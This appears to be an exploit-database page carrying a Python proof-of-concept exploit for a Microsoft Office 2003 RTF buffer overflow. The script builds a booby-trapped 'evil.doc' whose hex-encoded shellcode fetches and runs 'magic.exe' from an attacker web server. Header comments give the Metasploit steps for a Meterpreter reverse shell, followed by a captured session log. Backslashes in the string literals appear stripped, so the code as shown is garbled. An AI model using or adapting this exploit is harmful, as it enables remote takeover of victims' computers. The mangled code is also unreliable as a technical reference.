Home / exploits Microsoft Office 2003 Home/Pro Buffer Overflow
Posted on 10 January 2012
#!/usr/bin/python # # Note from the Exploit-DB team: This might be the same bug as: # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb # #-----------------------------------------------------------------------------------# # Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 # # Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) # ##################################################################################### # One shellcode to rule them all, One shellcode to find them, One shellcode to # # bring them all and in the darkness bind them!! # # # # Greetings: offsec, corelan, setoolkit # ##################################################################################### # (1) root@bt:~/Desktop/office# ./office2003.py # # root@bt:~/Desktop/office# mv evil.doc /var/www/ # # # # (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X # # > /var/www/magic.exe # # # # (3) msf exploit(handler) > exploit # # # # [*] Started reverse handler on 192.168.111.132:9988 # # [*] Starting the payload handler... # # [*] Sending stage (752128 bytes) to 192.168.111.128 # # [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)# # at 2012-01-08 18:46:26 +0800 # # # # meterpreter > ipconfig # # # # MS TCP Loopback interface # # Hardware MAC: 00:00:00:00:00:00 # # IP Address : 127.0.0.1 # # Netmask : 255.0.0.0 # # # # AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport # # Hardware MAC: 00:0c:29:6c:92:42 # # IP Address : 192.168.111.128 # # Netmask : 255.255.255.0 # #-----------------------------------------------------------------------------------# import binascii filename = "evil.doc" #-----------------------------------------------------------------------------------# # File Structure # #-----------------------------------------------------------------------------------# file = ( "{\rt##{shp{sp}}{shp{sp}}{shp{sp}}{shp{*shpinstshpfhdr0shpbxcolumns" "hpbyparash pwr2}{sp{sn {}{}{sn}{sn}{**}pFragments}{***}{sv{*****" "*********************}9;2;ffffffffff") #-----------------------------------------------------------------------------------# # Open raw socket to download payload to parent directory as "a.exe" # # ==> cmd execute "a.exe" # #-----------------------------------------------------------------------------------# magic = ( "x65x62x37x37x33x31x63x39x36x34x38x62x37x31x33x30" "x38x62x37x36x30x63x38x62x37x36x31x63x38x62x35x65" "x30x38x38x62x37x65x32x30x38x62x33x36x36x36x33x39" "x34x66x31x38x37x35x66x32x63x33x36x30x38x62x36x63" "x32x34x32x34x38x62x34x35x33x63x38x62x35x34x30x35" "x37x38x30x31x65x61x38x62x34x61x31x38x38x62x35x61" "x32x30x30x31x65x62x65x33x33x34x34x39x38x62x33x34" "x38x62x30x31x65x65x33x31x66x66x33x31x63x30x66x63" "x61x63x38x34x63x30x37x34x30x37x63x31x63x66x30x64" "x30x31x63x37x65x62x66x34x33x62x37x63x32x34x32x38" "x37x35x65x31x38x62x35x61x32x34x30x31x65x62x36x36" "x38x62x30x63x34x62x38x62x35x61x31x63x30x31x65x62" "x38x62x30x34x38x62x30x31x65x38x38x39x34x34x32x34" "x31x63x36x31x63x33x65x38x39x32x66x66x66x66x66x66" "x35x66x38x31x65x66x39x38x66x66x66x66x66x66x65x62" "x30x35x65x38x65x64x66x66x66x66x66x66x36x38x38x65" "x34x65x30x65x65x63x35x33x65x38x39x34x66x66x66x66" "x66x66x33x31x63x39x36x36x62x39x36x66x36x65x35x31" "x36x38x37x35x37x32x36x63x36x64x35x34x66x66x64x30" "x36x38x33x36x31x61x32x66x37x30x35x30x65x38x37x61" "x66x66x66x66x66x66x33x31x63x39x35x31x35x31x38x64" "x33x37x38x31x63x36x65x65x66x66x66x66x66x66x38x64" "x35x36x30x63x35x32x35x37x35x31x66x66x64x30x36x38" "x39x38x66x65x38x61x30x65x35x33x65x38x35x62x66x66" "x66x66x66x66x34x31x35x31x35x36x66x66x64x30x36x38" "x37x65x64x38x65x32x37x33x35x33x65x38x34x62x66x66" "x66x66x66x66x66x66x64x30x36x33x36x64x36x34x32x65" "x36x35x37x38x36x35x32x30x32x66x36x33x32x30x32x30" "x36x31x32x65x36x35x37x38x36x35x30x30") #------------------------------------------------------------------------------------------------------------------------------# # Two versions of office 2003 floating around: # # (1) Standalone version, (2) XP Service Pack upgrade # ################################################################################################################################ # Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... # # # # (1) 0x30324366 - CALL ESP - WINWORD.exe => "x36x36x34x33x33x32x33x30" # # => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe # # # # (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "x35x35x32x36x34x30x33x30" # # => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe # #------------------------------------------------------------------------------------------------------------------------------# EIP = "x36x36x34x33x33x32x33x30" #should ascii convert the Little Endian pointer filler = "x30x30x30x30x38x30x37x63"*2 + "x41"*24 + "x39x30"*18 buffer = "x23"*501 + "x30x35" + "x30"*40 + EIP + filler + magic #-----------------------------------------------------------------------------------# # Since we are downloading our payload from a remote webserver there are no # # restrictions on payload size or badcharacters... # #-----------------------------------------------------------------------------------# URL = "http://192.168.111.132/magic.exe" binnu = binascii.b2a_hex(URL) URL2 = "00" nxt="{}}}}}}" nxt+="x0dx0a" nxt+="}" textfile = open(filename , 'w') textfile.write(file+buffer+binnu+URL2+nxt) textfile.close()
